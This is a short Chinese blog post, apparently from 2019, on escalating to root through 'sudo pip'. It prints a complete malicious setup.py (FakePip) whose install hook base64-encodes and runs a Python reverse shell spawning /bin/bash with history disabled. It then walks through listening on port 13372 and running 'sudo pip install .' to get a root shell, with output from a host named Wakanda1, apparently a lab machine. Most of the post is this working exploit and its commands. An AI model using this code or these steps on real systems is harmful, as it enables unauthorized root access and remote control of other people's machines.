pip提权

在获取一个低权限shell后,可以检测下pip是否可以被sudo使用,一般有两种情况

1、知道低权限shell当前用户密码,可以直接通过sudo命令运行pip

2、不知道当前shell用户密码,但是指定了当前用户可以在无需密码的情况下通过sudo执行pip

 

一、下载fakepip攻击脚本,脚本来自于:https://github.com/0x00-0x00/FakePip,脚本如下:

from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
  def run(self):
    install.run(self)
    LHOST = 'localhost'  # change this
    LPORT = 13372
    
    reverse_shell = 'python -c "import os; import pty; import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{LHOST}\', {LPORT})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"'.format(LHOST=LHOST,LPORT=LPORT)
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

二、在开启一个shell,进到当前主机,确保手里有两个攻击目标的shell,并在shell2中监听本地13372端口

三、在shell1中调用fakepip攻击脚本

devops@Wakanda1:/$ cd /tmp
devops@Wakanda1:/$ mkdir fakepip && cd fakepip
devops@Wakanda1:创建攻击脚本,命名为setup.py
devops@Wakanda1:/tmp/fakepip$ sudo pip install . --upgraaade --force-reinstall
Unpacking /tmp/fakepip
  Running setup.py (path:/tmp/pip-AdN12x-build/setup.py) egg_info for package from file:///tmp/fakepip
    
Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip
    
^C  Rolling back uninstall of FakePip
Cleaning up...

四、回到shell2,这时在shell2中已经弹回了root权限的shell

posted @ 2019-01-09 17:57  隐念笎  阅读(460)  评论(0编辑  收藏  举报